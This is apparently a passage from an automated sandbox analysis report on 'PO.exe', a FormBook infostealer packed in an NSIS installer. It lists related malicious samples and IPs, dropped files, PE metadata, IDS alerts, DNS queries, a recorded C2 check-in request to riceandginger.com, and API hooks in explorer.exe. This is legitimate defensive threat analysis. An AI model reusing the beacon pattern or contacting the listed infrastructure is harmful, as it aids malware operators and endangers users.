                                          Payment Report.htmlGet hashmaliciousBrowse
                                          • 192.185.195.15
                                          receipt-xxxx.htmGet hashmaliciousBrowse
                                          • 162.241.124.32
                                          Order-027165.exeGet hashmaliciousBrowse
                                          • 192.232.218.185
                                          Ewkoo9igCN.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          49Bvnq7iFK.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          OtOXfybCmW.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          Ewkoo9igCN.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          W3aLwWHvWB.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          IJh1SAcSNP.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          OtOXfybCmW.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          AS-CHOOPAUSNew Order.exeGet hashmaliciousBrowse
                                          • 45.63.19.244
                                          B of L - way bill return.exeGet hashmaliciousBrowse
                                          • 45.32.111.89
                                          RFQ#4734.exeGet hashmaliciousBrowse
                                          • 108.61.161.76
                                          winlog.dllGet hashmaliciousBrowse
                                          • 45.63.27.162
                                          xqtEOiEeHh.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          nnrlOwKZlc.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          Balance payment..exeGet hashmaliciousBrowse
                                          • 140.82.59.108
                                          KEyjMfJJQjGet hashmaliciousBrowse
                                          • 155.138.211.25
                                          XQ2fszii3uGet hashmaliciousBrowse
                                          • 155.138.211.25
                                          7sZvYxFtN3.exeGet hashmaliciousBrowse
                                          • 45.76.56.26
                                          2021-04-01.exeGet hashmaliciousBrowse
                                          • 140.82.28.50
                                          deIt7iuD1y.exeGet hashmaliciousBrowse
                                          • 104.207.148.92
                                          E1PyFynLfp.exeGet hashmaliciousBrowse
                                          • 136.244.96.52
                                          hfGKHMTTDR.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          cMOtS8JQVW.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          diagnostic.exeGet hashmaliciousBrowse
                                          • 45.76.172.113
                                          l4gLNU4NcA.exeGet hashmaliciousBrowse
                                          • 45.63.42.1
                                          ekdCcEl5KV.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          4FNTlzlu10.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          SecuriteInfo.com.Trojan.Siggen12.58144.411.exeGet hashmaliciousBrowse
                                          • 45.76.53.14

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\0qs5eq4gqxghkspsiz
                                          Process:C:\Users\user\Desktop\PO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.999002923208001
                                          Encrypted:true
                                          SSDEEP:3072:hfhva0w76JwhEkYZNjdYCSGAJG3RQ4UzWdP7NmQfey45grprDHRL/Wdy:hfhvaR6JxBZNxFSGScP7NloKFHRTH
                                          MD5:C76B2A549514C1B2E11142566992D07A
                                          SHA1:79FEF3B446A7732B091745B111A0C73F82DE5DBB
                                          SHA-256:CE5B3CE5686E894A949D127B10FE27382F4737E4DF7B724269D669468434ADF8
                                          SHA-512:70AEF1C4093FB27FB434E4A28B96E914C2A0CEE46CB9982F4E596E9D285A1DF59766354058D28A9DD73BAA3CD24AE3D4086C82AA42C82620F6039CCB36C625B8
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..h*...U/...[H.Jp..vm..y3.L..}......Q`;...:..p.-..2.$z..#..5tdR.R.b.IJZ.V....~...UgOa.%......q2.S....t.+t..7J..3.....V.....AMvw.K1i...Wzk.D.d..yJ..v.@..,.N......\E...YI.....9..Y...L/u..fF.3(...}..t=.E..-.....!;w`...yx..k\z....//.`&.7Z..Af.1e....u?0....K.................s.JF....o;]..$m..t.^.&..H....G.4'.....G..U...q.k.d......l...]...?...u..j_.X...yH...<...1.|.......?.....{.r.D8@..u..'9.!.P.>.s....u.N6.B.$...?.[.r.iq.d...m.j.y.Si.[.....Z"...C.6t.a...T1....I......?.......c...~.&....A\.]....2..+..$a....8....K..)...Ph.v..u.7.MEKYN..8H..........f.=..i.V....e...}I5*....U..Ea...m.k;...Vr.T...{.|..uh....gt/..r..\q...2.A>r.......Z.F...........t.w}..}A..P.{..z).<.x.&.F}.G..:..T..G.......~+.....rD|O.eO.2F...:.K..'.p.DgBkt..7.4. K.....Dv.X..a@.T.)...1{.*.....+-.16..w./..v.~.%9..?#..O...A.........y.'.nhU.+.*..-.K,...x .._&;...U.1.C.C..}.7b...?...G.u<._. l..m1..s~{.B......5'K.'*O^.......l.\.d..}..e.Oj...*.._..4w.{w.K..I...&.8.....W.V....!].]........./k....
                                          C:\Users\user\AppData\Local\Temp\4hohyb48e3wlzft
                                          Process:C:\Users\user\Desktop\PO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.963332317122046
                                          Encrypted:false
                                          SSDEEP:96:kBksH+WPGZ9ImHb+KxkeDGwERGvqpW+LNd4YgLv8dYA53lmJolxQtxvz:1WytHb3ilqqpWUddg78uA+JoletNz
                                          MD5:8903F1E0C84D25A97CDA24636A27ED23
                                          SHA1:F6941D060997F540B06D6C6C85B9B56B23549DBC
                                          SHA-256:AE70E7DDAE9D864DD18CF6CDC1DC64C918B1FC01254C5AF6AA7DB3D1596E0010
                                          SHA-512:5FAE1B044DABB5E99607C4F76C8D8C661DAE754BC711074447646874CC70F179AFDB94B8770F1649197B4C118E9119EB61050A0F06184F407BE509257B09DDBB
                                          Malicious:false
                                          Reputation:low
                                          Preview: .~z..>.....b.T..l................K.M.;.R1D7%.T>#?d..).........%..Q]Lokg5M.9......hM...l...e.%i.....}.2>.LHD..U....$ ..9..bn-|xtF:.J..}TP..i.".....v.6z.......V.RCO.....f..'>51-....s..........W^ea]/?.3......b........c;#g......8G,..k..+......d..ds..8...W.88.<...... ....@...1dX$h.....=Hi..%0.hT....'#.....amT.{wE..I..WS..q.!......u.5y..E....m.QBN.....e..&e40,....r~.....A...V.d`\.>.2.......F...&...^n.b..v..../;.IEA.u...f..!...zSo..yu.I.ia]/...F.........}.F...._.).....N$30.z...........dp..~z..n.Qb..2.....T....9<.....f./..M....5.rK..c/+.....z..-/..ok..-_[W-9...ac.......m.|........6B..LH...".0.......ju....<..U.`..,......A.......G...B.&w2....7Cq.MI7.X5'..%w.ys.....Sg.uqm....b..U....T.............D.+@L^... 7..?........l."R-..p.r...Sr.}W..J.p...q....r..|...............5..C?t.//P...As@....owsRT.__[W.........}.u.u....Y.Q.......&B..LH.@fF40,.#J....gjX.tp.d\\..\....f..........d........3N..+?..IE38.r1..%.K...w./i.imi..\n.!...................U..
                                          C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
                                          Process:C:\Users\user\Desktop\PO.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):4.091011953873825
                                          Encrypted:false
                                          SSDEEP:48:vpggDzDVKAxlyNHvPviTLNuLebdsbriB4ZYmRSs:BTzxlivPvinktfiuZVR
                                          MD5:A622545967851FAF0405E20376399ACB
                                          SHA1:8000D6463895519F16325B7901321247A1C84D22
                                          SHA-256:06A5FAD63869EF665B9E99BAEA58BCE3BB59E85D19D744D53D0E70F58738FF32
                                          SHA-512:939213666AA71DBE3EF9D747216A0BC959E11151AA56CFDE7CEECE6BE5EE13BBC3488F34259D6824D4B7126907A616CC172864840707619FF91B271B093C59CC
                                          Malicious:false
                                          Reputation:low
                                          Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L..." ..............................................$"...............................text...\........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.919251123380622
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PO.exe
                                          File size:227498
                                          MD5:ba83b33d39ca6c3bf1f311d1b6a38d1a
                                          SHA1:ce0bcbb882b1a2105138b9955c1d892e4c6f0947
                                          SHA256:ce27bdaa30fc5a712b41888b529f52c87f90b9d196b975d47ec9b5236b48cebc
                                          SHA512:e251a936be79eed23d04874324be745090919af5ab7ee95310c06d8877f943fadc9752c38db70a5f0e7d3799e4f89f471233c96d18b92c12dab9bf78f59d2b13
                                          SSDEEP:3072:HyewmN4skJ6MWjfhva0w76JwhEkYZNjdYCSGAJG3RQ4UzWdP7NmQfey45grprDHO:HdrfhvaR6JxBZNxFSGScP7NloKFHRTs
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40314a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 0000017Ch
                                          push ebx
                                          push ebp
                                          push esi
                                          xor esi, esi
                                          push edi
                                          mov dword ptr [esp+18h], esi
                                          mov ebp, 00409240h
                                          mov byte ptr [esp+10h], 00000020h
                                          call dword ptr [00407030h]
                                          push esi
                                          call dword ptr [00407270h]
                                          mov dword ptr [007A3030h], eax
                                          push esi
                                          lea eax, dword ptr [esp+30h]
                                          push 00000160h
                                          push eax
                                          push esi
                                          push 0079E540h
                                          call dword ptr [00407158h]
                                          push 00409230h
                                          push 007A2780h
                                          call 00007FB80CD18308h
                                          mov ebx, 007AA400h
                                          push ebx
                                          push 00000400h
                                          call dword ptr [004070B4h]
                                          call 00007FB80CD15A49h
                                          test eax, eax
                                          jne 00007FB80CD15B06h
                                          push 000003FBh
                                          push ebx
                                          call dword ptr [004070B0h]
                                          push 00409228h
                                          push ebx
                                          call 00007FB80CD182F3h
                                          call 00007FB80CD15A29h
                                          test eax, eax
                                          je 00007FB80CD15C22h
                                          mov edi, 007A9000h
                                          push edi
                                          call dword ptr [00407140h]
                                          call dword ptr [004070ACh]
                                          push eax
                                          push edi
                                          call 00007FB80CD182B1h
                                          push 00000000h
                                          call dword ptr [00407108h]
                                          cmp byte ptr [007A9000h], 00000022h
                                          mov dword ptr [007A2F80h], eax
                                          mov eax, edi
                                          jne 00007FB80CD15AECh
                                          mov byte ptr [esp+10h], 00000022h
                                          mov eax, 00000001h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                          RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                          RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                          USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                          SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          04/08/21-12:14:02.069664TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.5162.241.24.122
                                          04/08/21-12:14:02.069664TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.5162.241.24.122
                                          04/08/21-12:14:02.069664TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.5162.241.24.122

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 8, 2021 12:13:40.544469118 CEST4972580192.168.2.5199.247.6.20
                                          Apr 8, 2021 12:13:40.562431097 CEST8049725199.247.6.20192.168.2.5
                                          Apr 8, 2021 12:13:41.064224005 CEST4972580192.168.2.5199.247.6.20
                                          Apr 8, 2021 12:13:41.082194090 CEST8049725199.247.6.20192.168.2.5
                                          Apr 8, 2021 12:13:41.595515013 CEST4972580192.168.2.5199.247.6.20
                                          Apr 8, 2021 12:13:41.613816023 CEST8049725199.247.6.20192.168.2.5
                                          Apr 8, 2021 12:14:01.927160978 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.069130898 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:02.069335938 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.069664001 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.211385965 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:02.566215038 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:02.752856016 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:04.872277021 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:04.872505903 CEST4972780192.168.2.5162.241.24.122
                                          Apr 8, 2021 12:14:04.872608900 CEST8049727162.241.24.122192.168.2.5
                                          Apr 8, 2021 12:14:04.872714996 CEST4972780192.168.2.5162.241.24.122

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 8, 2021 12:12:06.178884983 CEST6434453192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:06.191783905 CEST53643448.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:08.048573971 CEST6206053192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:08.061793089 CEST53620608.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:08.770917892 CEST6180553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:08.783648968 CEST53618058.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:08.987853050 CEST5479553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:09.006052971 CEST53547958.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:10.268135071 CEST4955753192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:10.281533957 CEST53495578.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:11.804956913 CEST6173353192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:11.817466021 CEST53617338.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:12.743650913 CEST6544753192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:12.756333113 CEST53654478.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:13.563091040 CEST5244153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:13.575824022 CEST53524418.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:14.841455936 CEST6217653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:14.853894949 CEST53621768.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:15.754436970 CEST5959653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:15.767277956 CEST53595968.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:17.557957888 CEST6529653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:17.571839094 CEST53652968.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:21.269838095 CEST6318353192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:21.282497883 CEST53631838.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:32.977138996 CEST6015153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:32.995311975 CEST53601518.8.8.8192.168.2.5
                                          Apr 8, 2021 12:12:52.821908951 CEST5696953192.168.2.58.8.8.8
                                          Apr 8, 2021 12:12:52.835186958 CEST53569698.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:01.819839954 CEST5516153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:01.838418007 CEST53551618.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:04.264900923 CEST5475753192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:04.286134005 CEST53547578.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:20.221487999 CEST4999253192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:20.282555103 CEST53499928.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:30.721555948 CEST6007553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:30.733474970 CEST53600758.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:33.983861923 CEST5501653192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:33.997242928 CEST53550168.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:40.495008945 CEST6434553192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:40.540290117 CEST53643458.8.8.8192.168.2.5
                                          Apr 8, 2021 12:13:53.829301119 CEST5712853192.168.2.58.8.8.8
                                          Apr 8, 2021 12:13:53.862998009 CEST53571288.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:01.800262928 CEST5479153192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:01.924691916 CEST53547918.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:15.857790947 CEST5046353192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:15.872793913 CEST53504638.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:17.984936953 CEST5039453192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:18.019665003 CEST53503948.8.8.8192.168.2.5
                                          Apr 8, 2021 12:14:22.730901957 CEST5853053192.168.2.58.8.8.8
                                          Apr 8, 2021 12:14:22.908416986 CEST53585308.8.8.8192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Apr 8, 2021 12:13:20.221487999 CEST192.168.2.58.8.8.80xef65Standard query (0)www.ayescarrental.comA (IP address)IN (0x0001)
                                          Apr 8, 2021 12:13:40.495008945 CEST192.168.2.58.8.8.80x4eaeStandard query (0)www.deerokoj.comA (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:01.800262928 CEST192.168.2.58.8.8.80x4e12Standard query (0)www.riceandginger.comA (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:22.730901957 CEST192.168.2.58.8.8.80x2515Standard query (0)www.665asilo.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Apr 8, 2021 12:13:40.540290117 CEST8.8.8.8192.168.2.50x4eaeNo error (0)www.deerokoj.com199.247.6.20A (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:01.924691916 CEST8.8.8.8192.168.2.50x4e12No error (0)www.riceandginger.comriceandginger.comCNAME (Canonical name)IN (0x0001)
                                          Apr 8, 2021 12:14:01.924691916 CEST8.8.8.8192.168.2.50x4e12No error (0)riceandginger.com162.241.24.122A (IP address)IN (0x0001)
                                          Apr 8, 2021 12:14:22.908416986 CEST8.8.8.8192.168.2.50x2515No error (0)www.665asilo.comtour.tourbuzz.netCNAME (Canonical name)IN (0x0001)
                                          Apr 8, 2021 12:14:22.908416986 CEST8.8.8.8192.168.2.50x2515No error (0)tour.tourbuzz.nettourbuzz.netCNAME (Canonical name)IN (0x0001)
                                          Apr 8, 2021 12:14:22.908416986 CEST8.8.8.8192.168.2.50x2515No error (0)tourbuzz.net52.20.218.92A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.riceandginger.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549727162.241.24.12280C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 8, 2021 12:14:02.069664001 CEST5414OUTGET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1
                                          Host: www.riceandginger.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Apr 8, 2021 12:14:04.872277021 CEST5415INHTTP/1.1 301 Moved Permanently
                                          Date: Thu, 08 Apr 2021 10:14:04 GMT
                                          Server: nginx/1.19.5
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 0
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          X-Redirect-By: WordPress
                                          Location: http://riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr
                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                          X-Endurance-Cache-Level: 2
                                          X-Server-Cache: true
                                          X-Proxy-Cache: MISS


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEF
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEF

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: PO.exe PID: 5720 Parent PID: 5624

                                          General

                                          Start time:12:12:27
                                          Start date:08/04/2021
                                          Path:C:\Users\user\Desktop\PO.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x400000
                                          File size:227498 bytes
                                          MD5 hash:BA83B33D39CA6C3BF1F311D1B6A38D1A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: PO.exe PID: 2904 Parent PID: 5720

                                          General

                                          Start time:12:12:29
                                          Start date:08/04/2021
                                          Path:C:\Users\user\Desktop\PO.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x400000
                                          File size:227498 bytes
                                          MD5 hash:BA83B33D39CA6C3BF1F311D1B6A38D1A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
